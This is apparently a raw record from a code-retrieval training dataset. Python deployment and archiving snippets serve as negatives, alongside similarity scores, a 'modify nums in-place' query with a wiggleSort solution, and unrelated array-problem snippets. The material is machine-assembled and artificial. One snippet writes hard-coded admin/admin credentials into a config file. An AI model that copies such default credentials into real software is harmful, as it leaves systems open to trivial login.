file_two_path]:\n assert os.path.exists(file_path), 'File %s does not exist.' % file_path\n start_time = datetime.datetime.now()\n print('Started concatenation at %s' % start_time)\n file_contents, headers = get_file_contents(file_two_path)\n file_contents = sort_file_contents(file_contents)\n file_contents = remove_pattern(file_contents, pattern)\n concatenate_files(file_one_path, file_contents, headers, output_path)\n print('Finished concatenation in %s' % (datetime.datetime.now() - start_time))", "def copyClusterFileToIntel(fileOnCluster,pathOnLinux):\n\tcommand = 'scp amennen@apps.pni.princeton.edu:{0} {1} '.format(fileOnCluster,pathOnLinux)\n\tcall(command,shell=True)\n\t#return command", "def main():\n with open('config.json') as config_file:\n configs = json.load(config_file)\n\n jar_list = utilities.upload_jars(configs)\n utilities.sign_jars(configs)\n\n artifact_folder = utilities.prepare_artifacts(configs, jar_list)\n\n repo_id = utilities.create_staging_repo(configs)\n utilities.deploy_to_staging_repo(configs, artifact_folder, repo_id)\n utilities.close_staging_repo(configs, repo_id)", "def do_pack():\n a = datetime.now()\n file_name = \"versions/web_static_{}{}{}{}{}{}.tgz\\\n\".format(a.year if a.year > 999 else \"0\" + str(a.year),\n a.month if a.month > 9 else \"0\" + str(a.month),\n a.day if a.day > 9 else \"0\" + str(a.day),\n a.hour if a.hour > 9 else \"0\" + str(a.hour),\n a.minute if a.minute > 9 else \"0\" + str(a.minute),\n a.second if a.second > 9 else \"0\" + str(a.second))\n try:\n print(\"Packing web_static to \" + file_name)\n local(\"mkdir -p versions\")\n\n local(\"tar -cvzf \" + file_name + \" web_static\")\n return file_name\n except:\n return None", "def compress_files(time_stamp, files_to_be_appended):\n process = subprocess.run([\"tar\", \"-czf\", f\"connect-log.{time_stamp}.tar.gz\", files_to_be_appended[0],\n files_to_be_appended[1],\n files_to_be_appended[2],\n files_to_be_appended[3], files_to_be_appended[4]], capture_output=True)", "def allocation_script_for_resource(allocation_name, output_path):\n\n vc3_client = get_vc3_client()\n allocation = vc3_client.getAllocation(allocation_name)\n pubkey = vc3_client.decode(allocation.pubtoken)\n dir_name = os.path.dirname(output_path)\n\n try:\n os.makedirs(dir_name, 0755)\n except OSError as e:\n if e.errno 
== errno.EEXIST:\n pass\n else:\n raise\n\n with open(output_path, 'w+b') as fh:\n script = \"\"\"#! /bin/sh\n\nPUBKEY=\"{}\"\nAUTHFILE=~/.ssh/authorized_keys\n\nif [ ! -d ~/.ssh ]\nthen\n /bin/echo -n \"Creating ~/.ssh directory... \"\n if mkdir -m 0700 -p ~/.ssh\n then\n echo \"done\"\n else\n echo \"error\"\n exit 1\n fi\nfi\n\nif [ ! -f $AUTHFILE ]\nthen\n /bin/echo -n \"Creating $AUTHFILE file... \"\n if (umask 177; touch $AUTHFILE)\n then\n echo \"done\"\n else\n echo \"error\"\n exit 1\n fi\nfi\n\n/bin/echo -n \"Copying public key to $AUTHFILE file... \"\n\nif /bin/grep -q \"$PUBKEY\" $AUTHFILE\nthen\n echo \"key already in file.\"\nelif /bin/echo \"$PUBKEY\" >> $AUTHFILE\nthen\n echo \"done\"\nelse\n echo \"error\"\n exit 1\nfi\n\nexit 0\n\n\"\"\".format(pubkey)\n fh.write(script)", "def main():\n remote_folder = '/s3mnt/carla-rl/outputs'\n local_folder = '/home/jeremy/Insight/Project'\n dns = get_publicdns()\n\n print(\"fetching data from server...\")\n os.system('rsync=$(/home/jeremy/.scripts_custom/rsync_pull_aws \\\n ubuntu@{} {} {})'.format(dns, remote_folder,\n local_folder))\n print(\"pulled from {} to {}\".format(remote_folder,\n local_folder))", "def main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"host\", type=str, nargs=\"+\")\n parser.add_argument(\"--user\", type=str, default=getpass.getuser())\n parser.add_argument(\"--path\", type=str, required=True)\n parser.add_argument(\"--keep\", type=int, default=3)\n parser.add_argument(\"--deployuser\", type=str, default=None)\n parser.add_argument(\"--postcmd\", type=str, default=None)\n\n args = parser.parse_args()\n if args.host is None:\n parser.print_usage()\n sys.exit(1)\n\n if args.deployuser is None:\n args.deployuser = args.user\n\n init(autoreset=True)\n deploy(args)", "def do_pack():\n with settings(warn_only=True):\n res = local(\"mkdir -p versions\")\n date = dt.now()\n pathname = \"versions/web_static_\"\n pathname += str(date.year)\n pathname += str(date.month)\n pathname += str(date.day)\n pathname += str(date.hour)\n pathname += str(date.minute)\n pathname += str(date.second)\n pathname += \".tgz\"\n res2 = local(\"tar -cvzf \" + pathname + \" web_static\")\n if res2.return_code == 0:\n return pathname", "def deploy_to_s3():\n env.gzip_path = '%(path)s/repository/gzip/assets/' % env\n run(('s3cmd -P --add-header=Content-encoding:gzip --guess-mime-type --rexclude-from=%(path)s/repository/s3exclude sync %(gzip_path)s s3://%(s3_bucket)s/%(project_name)s/') % env)", "def do_pack():\n\n local(\"mkdir -p versions\")\n current = dt.now()\n current = current.now()\n tgz = \"web_static_{}.tgz\".format(current.strftime(\"%Y%m%d%H%M%S\"))\n working = local(\"tar -cavf versions/{} web_static\".format(tgz))\n\n if working.failed:\n return None\n else:\n return \"versions/{}\".format(tgz)", "def main (options, args):\n if len (args) == 0:\n args = [os.path.join (os.environ ['OWN'], '...')]\n p4zip (options, string.join (args))\n if options.verbose:\n print 'created', os.path.abspath (options.outfile)", "def write_mesh_csh(self):\n str = self.LicLocalPort\n fout = open(self.cshBatch1File+\".csh\",\"w\")\n fout.write(\"\"\"\\\n#!/bin/csh\n\nif ( $#argv == 0 ) then\n echo \"\"\n echo \"USAGE: $0 [-powerOnDemand] javaBatchFile.java\"\n echo \"\"\n exit\nendif\n\nset powerOnDemand=0\nset javaBatchFile=$1\nset powerOnDemandLicense=\"\"\nif ( \"$1\" == \"-powerOnDemand\" ) then\n set powerOnDemand=1\n set javaBatchFile=$2\n set powerOnDemandLicense=\"-licpath %s@localhost -podkey %s\"\nendif\n\"\"\" % 
(str,self.starccmLic))\n\n fout.write(\"\"\"\\\n\nalias echo \"/bin/echo -e\"\necho \"\\\\n#==============================================\"\necho \"# Begin Star Meshing\"\necho \"# Java Batch File = $javaBatchFile\"\nif ( $powerOnDemand == 1 ) echo \"# Using Power on Demand license.\"\nset starttime = `date`\necho \"# Start Time = ${starttime}\\\\n\"\n\nif ( $powerOnDemand == 1 ) then\n echo \"\\\\n# Running 'killall ssh' to clear out all prior tunnels.\"\n killall ssh\n echo \"\\\\n# Making a tunnel for the Power on Demand License.\"\n ssh -f -L %s:flex.cd-adapco.com:1999 -L 2099:flex.cd-adapco.com:2099 -N %s\n echo \"\\\\n# Checking to see if there is a valid port tunnel in place for the Power on Demand License.\"\n ps -ef | grep '%s:flex.cd-adapco.com:1999'\nendif\n\"\"\" % (str,self.LicAccessName,str))\n\n fout.write(\"\"\"\\\n\nsetenv CDLMD_LICENSE_FILE %s\nunsetenv LM_LICENSE_FILE\n\nset EXEC = \"%s\"\n\n$EXEC -power ${powerOnDemandLicense} \\\\\n -batch $javaBatchFile\nset endtime = `date`\necho \"# End Time = ${endtime}\"\necho \"# Start Time = ${starttime}\\\\n\"\necho \"# End Star Simulation\\\\n\"\n\"\"\" % (self.CDLMD_LicFile, self.starccmExec))\n\n fout.close()", "def do_pack():\n\n now = datetime.now()\n time_now = now.strftime(\"%Y%m%d%H%M%S\")\n archive_name = \"versions/web_static_\" + time_now + \".tgz\"\n local('mkdir -p versions')\n archive_command = local(\"tar -zcvf \" + archive_name + \" web_static\")\n\n if archive_command.succeeded:\n return archive_name\n\n return None", "def deploy_binary(self, source_tar, dest_dir):\n parent_dest_dir = os.path.dirname(dest_dir)\n self._shell_client.exec_command('rm -rf {0}; mkdir -p {0}'.format(dest_dir), error_on_failure=True)\n self._shell_client.copy(source_tar, '{}/clusterrunner.tgz'.format(parent_dest_dir), error_on_failure=True)\n self._shell_client.exec_command(\n command='tar zxvf {}/clusterrunner.tgz -C {}'.format(parent_dest_dir, dest_dir),\n error_on_failure=True\n )", "def compress_wrapper(args: Namespace) -> None:\n directory_path = os.path.join(DATASETS_DIR, args.directory)\n compress_datasets(directory_path, args.holdout)", "def _pack_ex(file, names, cwd, implementor=None):\n assert isdir(cwd)\n if exists(file):\n console.rm(file)\n if not implementor: implementor = GzipTarredFile\n \n with console.cd(cwd):\n relnames = [relpath(name, cwd) for name in names]\n implementor.pack(relnames, file)\n return file", "def generate_stack_script(self):\n\n # Generate the stacking script\n # configuration, then move roles to the target rootfs\n with tempfile.NamedTemporaryFile(mode='w+', delete=False) as working_file:\n # Retrieve geenration date\n today = datetime.datetime.now()\n\n # Generate file header\n working_file.write(\"#\\n\")\n working_file.write(\"# DFT Create Stack\\n\")\n working_file.write(\"#\\n\")\n working_file.write(\"# This script has been generated automatically by the DFT toolkit.\\n\")\n working_file.write(\"# It is in charge of mounting and stacking the different items\\n\")\n working_file.write(\"# of the firmware.\\n\")\n working_file.write(\"#\\n\")\n working_file.write(\"# Generation date : \" + today.strftime(\"%d/%m/%Y - %H:%M.%S\") + \"\\n\")\n working_file.write(\"#\\n\")\n working_file.write(\"\\n\")\n working_file.close()\n\n # Generate the common stuff. 
It includes mounting the target (used later for stacking them)\n self.generate_common_mount(working_file.name)\n\n # Call the method dedicated to the selected stacking method\n if self.project.firmware_definition[\"layout\"][\"method\"] == \"aufs\":\n # Generate aufs stuff\n self.generate_aufs_stacking(working_file.name)\n elif self.project.firmware_definition[\"layout\"][\"method\"] == \"overlayfs\":\n # Generate overlayfs stuff\n self.generate_overlayfs_stacking(working_file.name)\n else:\n # If we reach this code, then method was unknown\n self.project.logging.critical(\"Unknown stacking method \" +\n self.project.firmware_definition[\"layout\"][\"method\"])\n exit(1)\n\n # We are done with file generation, close it now\n\n # Generate the file path\n filepath = self.project.stacking_script_filename\n\n # Finally move the temporary file under the rootfs tree\n sudo_command = \"mv -f \" + working_file.name + \" \" + filepath\n self.execute_command(sudo_command)", "def main():\n\n args = _parse_arguments()\n path = _get_dragons_input_test_path()\n create_test_folder_if_does_not_exist(path)\n download_non_existing_test_files(path, args.list_of_files)", "def do_pack():\n date = datetime.datetime.now()\n archive = 'versions/web_static_{}{}{}{}{}{}.tgz'.format(date.year,\n date.month,\n date.day,\n date.hour,\n date.minute,\n date.second)\n local('mkdir -p versions')\n check = local('tar -cvzf {} web_static'.format(archive))\n if check.failed:\n return None\n else:\n return archive", "def do_pack():\n from os import mkdir, path\n\n filename = \"web_static_{}.tgz\".format(now.strftime(\"%Y%m%d%H%M%S\"))\n filepath = \"versions/{}\".format(filename)\n\n try:\n mkdir('./versions')\n except FileExistsError:\n pass\n\n print(\"Packing web_static to {}\".format(filepath))\n cmd = local('tar -cvzf {} web_static'.format(filepath))\n if (cmd.return_code == 0):\n filesize = path.getsize(filepath)\n print(\"web_static packed: {} -> {}Bytes\".format(filepath, filesize))\n return filepath\n return None", "def generate_compression_command_line_objects(dir_stack, command_line_parameters):\r\n\r\n # Generate command lines\r\n threads = []\r\n thread_sizes = []\r\n first_d = True\r\n for d in dir_stack:\r\n if first_d:\r\n first_d = False\r\n continue\r\n if not os.path.isdir(d.path): continue\r\n # Iterate over files in current directory and and generate (de)compression\r\n # command line for files that are in suitable format\r\n while True:\r\n try:\r\n # The command instance is generated without exceptions if the\r\n # command execution has failed (i.e. expected output\r\n # file does not exist). 
Otherwise NewFileError is raised.\r\n if command_line_parameters.compress_run == 'compress':\r\n command_line = AvailableCommands.commands['gzip']('', d, d)\r\n elif command_line_parameters.compress_run == 'decompress':\r\n command_line = AvailableCommands.commands['gzip']('-d', d, d)\r\n except STAPLERerror.NewFileExists:\r\n pass\r\n except STAPLERerror.VirtualIOError:\r\n break\r\n\r\n abs_file_path = os.path.join(d.path, command_line.out_cmd['-!i'])\r\n\r\n # Create new thread for current command if new threads can be created\r\n if len(threads) < command_line_parameters.max_job_count or command_line_parameters.max_job_count is None:\r\n threads.append([command_line])\r\n thread_sizes.append(os.stat(abs_file_path).st_size)\r\n # If max number of threads have been created, add command to the thread\r\n # with the least amount of data to handle\r\n else:\r\n threads[thread_sizes.index(min(\r\n thread_sizes))].append(command_line)\r\n thread_sizes[thread_sizes.index(min(thread_sizes))] += \\\r\n os.stat(abs_file_path).st_size\r\n\r\n # Report if no proper input files have been found\r\n if not threads and command_line_parameters.compress_run == 'compress':\r\n raise STAPLERerror('Workflow does not contain any files that can be compressed.')\r\n if not threads and command_line_parameters.compress_run == 'decompress':\r\n raise STAPLERerror('Workflow does not contain any files that can be decompressed.')\r\n\r\n # Calculate & report estimated run time for the current job\r\n if command_line_parameters.compress_run == 'compress':\r\n # Assume that gzip compression speed is 20Mb per second (should\r\n # give plenty of time for modern processors)\r\n est_run_time = 'Estimated recommended run time for this job is (hh:mm:ss):\\n' \\\r\n '{0}'.format(datetime.timedelta(seconds=(max(thread_sizes) / 20000000) + 60))\r\n else:\r\n # Assume that gzip decompression speed is 60Mb per second (should\r\n # give plenty of time for modern processors)\r\n est_run_time = 'Estimated recommended run time for this job is (hh:mm:ss):\\n' \\\r\n '{0}'.format(datetime.timedelta(seconds=(max(thread_sizes) / 60000000) + 60))\r\n print est_run_time\r\n logging.info(est_run_time)\r\n\r\n workloads = [threads]\r\n return workloads", "def setup():\n\n with cd(env.homedir):\n\n # clone repository from github\n sudo('git clone https://github.com/starzel/demo.starzel.de.git', user=env.deploy_user) # noqa: E501\n\n with cd(env.directory):\n\n # requirements\n # sudo('python python-dev build-essential zlib1g-dev libssl-dev libxml2-dev libxslt1-dev wv poppler-utils libtiff5-dev libjpeg62-dev zlib1g-dev libfreetype6-dev liblcms1-dev libwebp-dev') # noqa: E501\n\n # prepare buildout\n sudo('ln -s local_production.cfg local.cfg', user=env.deploy_user)\n sudo('echo -e \"[buildout]\\nlogin = admin\\npassword = admin\" > secret.cfg', user=env.deploy_user) # noqa: E501\n\n # bootstrap and run bildout once\n sudo('./bin/pip install -r requirements.txt', user=env.deploy_user)\n sudo('./bin/buildout', user=env.deploy_user)\n\n # start supervisor which starts plone instance also\n sudo('./bin/supervisord', user=env.deploy_user)", "def upload(\n path: Path = typer.Argument(..., help=\"Path to your source code\"),\n entrypoint: str = typer.Argument(..., help=\"Your program entrypoint\"),\n channel: Optional[str] = typer.Option(default=None, help=help_strings.CHANNEL),\n memory: int = typer.Option(\n sdk_settings.DEFAULT_VM_MEMORY, help=\"Maximum memory allocation on vm in MiB\"\n ),\n vcpus: int = typer.Option(\n 
sdk_settings.DEFAULT_VM_VCPUS, help=\"Number of virtual cpus to allocate.\"\n ),\n timeout_seconds: float = typer.Option(\n sdk_settings.DEFAULT_VM_TIMEOUT,\n help=\"If vm is not called after [timeout_seconds] it will shutdown\",\n ),\n private_key: Optional[str] = typer.Option(\n sdk_settings.PRIVATE_KEY_STRING, help=help_strings.PRIVATE_KEY\n ),\n private_key_file: Optional[Path] = typer.Option(\n sdk_settings.PRIVATE_KEY_FILE, help=help_strings.PRIVATE_KEY_FILE\n ),\n print_messages: bool = typer.Option(False),\n print_code_message: bool = typer.Option(False),\n print_program_message: bool = typer.Option(False),\n runtime: str = typer.Option(\n None,\n help=\"Hash of the runtime to use for your program. Defaults to aleph debian with Python3.8 and node. You can also create your own runtime and pin it\",\n ),\n beta: bool = typer.Option(False),\n debug: bool = False,\n persistent: bool = False,\n persistent_volume: Optional[List[str]] = typer.Option(\n None,\n help=\"\"\"Takes 3 parameters \n A persistent volume is allocated on the host machine at any time \n eg: Use , to seperate the parameters and no spaces \n --persistent_volume persistence=host,name=my-volume,size=100 ./my-program main:app\n \"\"\",\n ),\n ephemeral_volume: Optional[List[str]] = typer.Option(\n None,\n help=\"\"\"Takes 1 parameter Only \n Ephemeral volumes can move and be removed by the host,Garbage collected basically, when the VM isn't running \n eg: Use , to seperate the parameters and no spaces \n --ephemeral-volume size_mib=100 ./my-program main:app \"\"\",\n ),\n immutable_volume: Optional[List[str]] = typer.Option(\n None,\n help=\"\"\"Takes 3 parameters \n Immutable volume is one whose contents do not change \n eg: Use , to seperate the parameters and no spaces \n --immutable-volume ref=25a393222692c2f73489dc6710ae87605a96742ceef7b91de4d7ec34bb688d94,use_latest=true,mount=/mnt/volume ./my-program main:app\n \"\"\",\n ),\n):\n\n setup_logging(debug)\n\n path = path.absolute()\n\n try:\n path_object, encoding = create_archive(path)\n except BadZipFile:\n typer.echo(\"Invalid zip archive\")\n raise typer.Exit(3)\n except FileNotFoundError:\n typer.echo(\"No such file or directory\")\n raise typer.Exit(4)\n\n account: AccountFromPrivateKey = _load_account(private_key, private_key_file)\n\n runtime = (\n runtime\n or input(f\"Ref of runtime ? 
[{sdk_settings.DEFAULT_RUNTIME_ID}] \")\n or sdk_settings.DEFAULT_RUNTIME_ID\n )\n\n volumes = []\n\n # Check if the volumes are empty\n if (\n persistent_volume is None\n or ephemeral_volume is None\n or immutable_volume is None\n ):\n for volume in prompt_for_volumes():\n volumes.append(volume)\n typer.echo(\"\\n\")\n\n # else Parse all the volumes that have passed as the cli parameters and put it into volume list\n else:\n if len(persistent_volume) > 0:\n persistent_volume_dict = volume_to_dict(volume=persistent_volume)\n volumes.append(persistent_volume_dict)\n if len(ephemeral_volume) > 0:\n ephemeral_volume_dict = volume_to_dict(volume=ephemeral_volume)\n volumes.append(ephemeral_volume_dict)\n if len(immutable_volume) > 0:\n immutable_volume_dict = volume_to_dict(volume=immutable_volume)\n volumes.append(immutable_volume_dict)\n\n subscriptions: Optional[List[Dict]]\n if beta and yes_no_input(\"Subscribe to messages ?\", default=False):\n content_raw = input_multiline()\n try:\n subscriptions = json.loads(content_raw)\n except json.decoder.JSONDecodeError:\n typer.echo(\"Not valid JSON\")\n raise typer.Exit(code=2)\n else:\n subscriptions = None\n\n with AuthenticatedAlephClient(\n account=account, api_server=sdk_settings.API_HOST\n ) as client:\n # Upload the source code\n with open(path_object, \"rb\") as fd:\n logger.debug(\"Reading file\")\n # TODO: Read in lazy mode instead of copying everything in memory\n file_content = fd.read()\n storage_engine = (\n StorageEnum.ipfs\n if len(file_content) > 4 * 1024 * 1024\n else StorageEnum.storage\n )\n logger.debug(\"Uploading file\")\n user_code: StoreMessage\n status: MessageStatus\n user_code, status = client.create_store(\n file_content=file_content,\n storage_engine=storage_engine,\n channel=channel,\n guess_mime_type=True,\n ref=None,\n )\n logger.debug(\"Upload finished\")\n if print_messages or print_code_message:\n typer.echo(f\"{user_code.json(indent=4)}\")\n program_ref = user_code.item_hash\n\n # Register the program\n message, status = client.create_program(\n program_ref=program_ref,\n entrypoint=entrypoint,\n runtime=runtime,\n storage_engine=StorageEnum.storage,\n channel=channel,\n memory=memory,\n vcpus=vcpus,\n timeout_seconds=timeout_seconds,\n persistent=persistent,\n encoding=encoding,\n volumes=volumes,\n subscriptions=subscriptions,\n )\n logger.debug(\"Upload finished\")\n if print_messages or print_program_message:\n typer.echo(f\"{message.json(indent=4)}\")\n\n item_hash: ItemHash = message.item_hash\n hash_base32 = (\n b32encode(b16decode(item_hash.upper())).strip(b\"=\").lower().decode()\n )\n\n typer.echo(\n f\"Your program has been uploaded on aleph.im .\\n\\n\"\n \"Available on:\\n\"\n f\" {settings.VM_URL_PATH.format(hash=item_hash)}\\n\"\n f\" {settings.VM_URL_HOST.format(hash_base32=hash_base32)}\\n\"\n \"Visualise on:\\n https://explorer.aleph.im/address/\"\n f\"{message.chain}/{message.sender}/message/PROGRAM/{item_hash}\\n\"\n )", "def call_compress_files(jwcl, jobfiles, putinfo):\n\n if miscutils.fwdebug_check(3, \"PFWRUNJOB_DEBUG\"):\n miscutils.fwdebug_print(\"BEG\")\n\n # determine which files need to be compressed\n to_compress = []\n for fname, fdict in putinfo.items():\n if fdict['filecompress']:\n to_compress.append(fdict['src'])\n\n if miscutils.fwdebug_check(6, \"PFWRUNJOB_DEBUG\"):\n miscutils.fwdebug_print(\"to_compress = %s\" % to_compress)\n\n if to_compress:\n miscutils.fwdebug_print(\"0 files to compress\")\n else:\n errcnt = 0\n (res, _, _) = 
pfwcompress.compress_files(to_compress,\n jwcl[pfwdefs.COMPRESSION_SUFFIX],\n jwcl[pfwdefs.COMPRESSION_EXEC],\n jwcl[pfwdefs.COMPRESSION_ARGS],\n 3, jwcl[pfwdefs.COMPRESSION_CLEANUP])\n\n filelist = []\n wgb_fnames = []\n for fname, fdict in res.items():\n if miscutils.fwdebug_check(3, 'PFWRUNJOB_DEBUG'):\n miscutils.fwdebug_print(\"%s = %s\" % (fname, fdict))\n\n if fdict['err'] is None:\n # add new filename to jobfiles['outfullnames'] so not junk\n jobfiles['outfullnames'].append(fdict['outname'])\n\n # update jobfiles['output_putinfo'] for transfer\n (filename, compression) = miscutils.parse_fullname(fdict['outname'],\n miscutils.CU_PARSE_FILENAME | miscutils.CU_PARSE_EXTENSION)\n if filename in putinfo:\n # info for desfile entry\n dinfo = diskutils.get_single_file_disk_info(fdict['outname'],\n save_md5sum=True,\n archive_root=None)\n # compressed file should be one saved to archive\n putinfo[filename]['src'] = fdict['outname']\n putinfo[filename]['compression'] = compression\n putinfo[filename]['dst'] += compression\n\n del dinfo['path']\n wgb_fnames.append(filename + compression)\n dinfo['filetype'] = putinfo[filename]['filetype']\n filelist.append(dinfo)\n\n else:\n miscutils.fwdie(\"Error: compression mismatch %s\" % filename,\n pfwdefs.PF_EXIT_FAILURE)\n else: # errstr\n miscutils.fwdebug_print(\"WARN: problem compressing file - %s\" % fdict['err'])\n errcnt += 1\n\n # register compressed file with file manager, save used provenance info\n filemgmt = dynam_load_filemgmt(jwcl, None)\n for finfo in filelist:\n filemgmt.save_desfile(finfo)\n\n if miscutils.fwdebug_check(3, \"PFWRUNJOB_DEBUG\"):\n miscutils.fwdebug_print(\"END\")", "def do_pack():\n time = datetime.utcnow().strftime('%Y%m%d%H%M%S')\n file_name = \"versions/web_static_{}.tgz\".format(time)\n try:\n local(\"mkdir -p ./versions\")\n local(\"tar --create --verbose -z --file={} ./web_static\"\n .format(file_name))\n return file_name\n except:\n return None", "def init():\n pass\n # destination_dir = os.getcwd() + '/deploy'\n # try:\n # os.makedirs(destination_dir)\n # except OSError as e:\n # if e.errno == errno.EEXIST:\n # print('''AWS \"deploy\" directory already exists in this folder\n # \\n''', destination_dir)\n # copy_tree(deploy_path_join('../deploy'), destination_dir)", "def main():\n parser = optparse.OptionParser()\n info = ('The input json-format file name. Such as: '\n '--dest_dir=/hangonman/android')\n parser.add_option('-d', '--dest_dir', action='store', dest='dest_dir',\n help=info)\n opts, _ = parser.parse_args()\n if not os.path.exists(opts.dest_dir):\n print 'Destination directory is not existed!'\n return 1\n latest_url = ('http://wrt-build.sh.intel.com/archive/'\n 'snapshots/dev-wrt-android-build/LATEST')\n file_name = 'xwalk_app_template.tar.gz'\n app_template_handler = GetXWalkAppTemplate(latest_url, file_name)\n try:\n app_template_handler.ExtractFile(opts.dest_dir)\n except tarfile.TarError:\n raise Exception('Error in the process of tar file.')\n return 0", "def _pre_tasks(self, body, work_dir):\n # Check for custom information\n # Check if its bulk provisioning... 
os key is available in bulk mode\n if body.get('os'):\n _ks = map(lambda x: x.get('kickstart'), body['os'])\n self._copy_files_to_server(body, 'kickstart', _ks, work_dir)\n\n _cs = map(lambda x: x.get('custom_script'), body['os'])\n self._copy_files_to_server(body, 'custom_script', _cs, work_dir)\n else:\n # Check if user has custom kickstart and script\n if body.get('kickstart'):\n _ks = body.get('kickstart')\n self._copy_files_to_server(body, 'kickstart', _ks, work_dir)\n\n if body.get('custom_script'):\n _cs = body.get('custom_script')\n self._copy_files_to_server(body, 'custom_script', _cs, work_dir)\n\n flag = True if body.get('os', None) else False\n\n return self._generate_xml(body, work_dir, flag)" ]
[ "0.6320039", "0.6044907", "0.6033638", "0.6010432", "0.5978256", "0.5924643", "0.5897727", "0.5866136", "0.5854039", "0.58496296", "0.5825296", "0.5823549", "0.58181125", "0.57648784", "0.5761756", "0.5755998", "0.57477236", "0.5711603", "0.5669225", "0.5627048", "0.5583162", "0.5579366", "0.55793226", "0.55736995", "0.5571833", "0.5568759", "0.55543983", "0.55483025", "0.5539294", "0.55334115", "0.5523621", "0.5522959", "0.5522865", "0.5515405", "0.5508553", "0.5501676", "0.5488679", "0.5479447", "0.5473618", "0.5464698", "0.545094", "0.543944", "0.5429933", "0.54264003", "0.54198587", "0.5408055", "0.5401895", "0.53981686", "0.53914547", "0.53761595", "0.5374446", "0.53743494", "0.5354524", "0.53463525", "0.534454", "0.53421813", "0.53372717", "0.53343606", "0.5330873", "0.5329818", "0.53289914", "0.5328713", "0.53266776", "0.53250396", "0.5321839", "0.5317799", "0.5315645", "0.5315613", "0.5312208", "0.530261", "0.52974695", "0.52930564", "0.5286445", "0.5278491", "0.5276914", "0.52760994", "0.5261005", "0.5259878", "0.5257664", "0.5244371", "0.5242713", "0.5229185", "0.52284557", "0.5226588", "0.5222672", "0.5204533", "0.5200259", "0.5194749", "0.5193921", "0.51834273", "0.5180963", "0.51808363", "0.51725125", "0.517195", "0.5171647", "0.5167536", "0.5160288", "0.5159462", "0.51589715", "0.51579595" ]
0.5492905
36
Do not return anything, modify nums in-place instead.
def wiggleSort(self, nums: List[int]) -> None:
    def quickselect(low, hight, k, arr):
        pivot = random.randint(low, hight)
        arr[pivot], arr[hight] = arr[hight], arr[pivot]
        pivot = low
        for i in range(low, hight):
            if arr[i] < arr[hight]:
                arr[i], arr[pivot] = arr[pivot], arr[i]
                pivot += 1
        arr[pivot], arr[hight] = arr[hight], arr[pivot]
        if k < pivot:
            return quickselect(low, pivot - 1, k, arr)
        elif k > pivot:
            return quickselect(pivot + 1, hight, k, arr)
        else:
            return arr[k]

    median = quickselect(0, len(nums) - 1, len(nums) // 2, nums)
    mid = len(nums) // 2
    vi = lambda x: 2 * x + 1 if x < mid else (x - mid) * 2
    i, j, k = 0, 0, len(nums) - 1
    while j <= k:
        if nums[vi(j)] < median:
            nums[vi(j)], nums[vi(k)] = nums[vi(k)], nums[vi(j)]
            k -= 1
        elif nums[vi(j)] > median:
            nums[vi(i)], nums[vi(j)] = nums[vi(j)], nums[vi(i)]
            i += 1
            j += 1
        else:
            j += 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def fn(i):\n if i == len(nums): ans.append(nums.copy())\n for j in range(i, len(nums)): \n nums[i], nums[j] = nums[j], nums[i]\n fn(i+1)\n nums[i], nums[j] = nums[j], nums[i]", "def double_nums(num_list):", "def remove_dups(nums):\r\n nums[:] = sorted(list(set(nums)))\r\n return nums", "def _permuteUnique(self, curr_arr, nums):\r\n mem = dict()\r\n\r\n if not nums:\r\n self.output.append(curr_arr)\r\n return\r\n\r\n for i, v in enumerate(nums):\r\n if v in mem:\r\n continue\r\n else:\r\n mem[v] = 1\r\n new_arr = list(curr_arr)\r\n new_arr.append(v)\r\n self._permuteUnique(new_arr, nums[:i] + nums[i+1:])", "def moveZeroes2(self, nums: List[int]) -> None:\n i = 0\n for num in nums:\n if num != 0:\n nums[i] = num\n i += 1\n\n while i < len(nums):\n nums[i] = 0\n i += 1", "def removeDuplicates(self, nums: List[int]) -> int:\n trail = 0\n \n for i, n in enumerate(nums):\n if nums[trail] != nums[i]:\n trail += 1\n nums[trail] = nums[i]\n\n return trail + 1", "def fn(i):\n if i == len(nums): ans.append(nums.copy())\n seen = set()\n for k in range(i, len(nums)):\n if nums[k] not in seen:\n seen.add(nums[k])\n nums[i], nums[k] = nums[k], nums[i]\n fn(i+1)\n nums[i], nums[k] = nums[k], nums[i]", "def single_number(nums):\n i = 0\n for num in nums:\n i ^= num\n return i", "def moveZeroes(self, nums: List[int]) -> None:\n zero_count = Counter(nums)\n for num in range(zero_count[0]):\n nums.remove(0)\n nums.extend([0]*zero_count[0])\n print(nums)", "def moveZeroes(self, nums: List[int]) -> None:\n j = 0\n for i, value in enumerate(nums):\n if value != 0:\n nums[j], nums[i] = nums[i], nums[j]\n j += 1\n return nums", "def moveZeroes(self, nums: List[int]) -> None:\n i = 0\n while i != len(nums) and nums[i]:\n i += 1\n j = i\n while j != len(nums):\n if not nums[j]:\n j += 1\n else:\n nums[i] = nums[j]\n i += 1\n j += 1\n while i != len(nums):\n nums[i] = 0\n i += 1", "def moveZeroes(self, nums: [int]) -> None:\n count = 0\n try:\n while 1:\n nums.remove(0)\n count += 1\n except:\n pass\n if count:\n nums.extend([0] * count)", "def reset(self) -> List[int]:\n return self.nums", "def removeDuplicates(nums):\n i = 0\n j = 1\n for r in range(len(nums)):\n if j >= len(nums):\n print(i + 1, nums)\n return i + 1\n if nums[i] != nums[j]:\n i = i + 1\n nums[i] = nums[j]\n j = j + 1", "def moveZeroes(self, nums):\n count = 0 \n for i, val in enumerate(nums):\n if val != 0:\n nums[count] = val\n count += 1\n \n while(count < len(nums)):\n nums[count] = 0\n count += 1 #increment the count\n \n return nums", "def moveZeroes(self, nums: List[int]) -> None:\n # 双指针操作:\n # 记录非零元数下标:\n i = 0\n for j in range(len(nums)):\n # 遇到非零元素时,i加1:\n if nums[j] != 0:\n # 如果i与j不等时,才调换:\n if i != j:\n nums[i] , nums[j] = nums[j] , nums[i]\n i += 1", "def moveZeroes(self, nums: List[int]) -> None:\n \n store = []\n zero_cnt = 0\n \n for i in nums:\n if i == 0:\n zero_cnt += 1\n else:\n store.append(i)\n \n store += [0 for _ in range(zero_cnt)]\n\n for i in range(len(nums)):\n nums[i] = store[i]", "def permuteClever(self, nums):\n self.visited = [False] * len(nums)\n results = []\n tmp = []\n step = 0\n \n self.helper(results, tmp, nums, step)\n \n return results", "def moveZeroes(self, nums: List[int]) -> None:\n\n i, count = 0, 0\n while i < len(nums):\n if not nums[i]:\n nums.pop(i)\n count+=1\n else:\n i += 1\n \n nums.extend([0]*count)", "def moveZeroes(self, nums: [int]) -> None:\n for num in nums:\n if num == 0:\n nums.remove(num)\n nums.append(num)\n # print(nums)", "def moveZeroes(self, nums):\r\n\r\n pos = 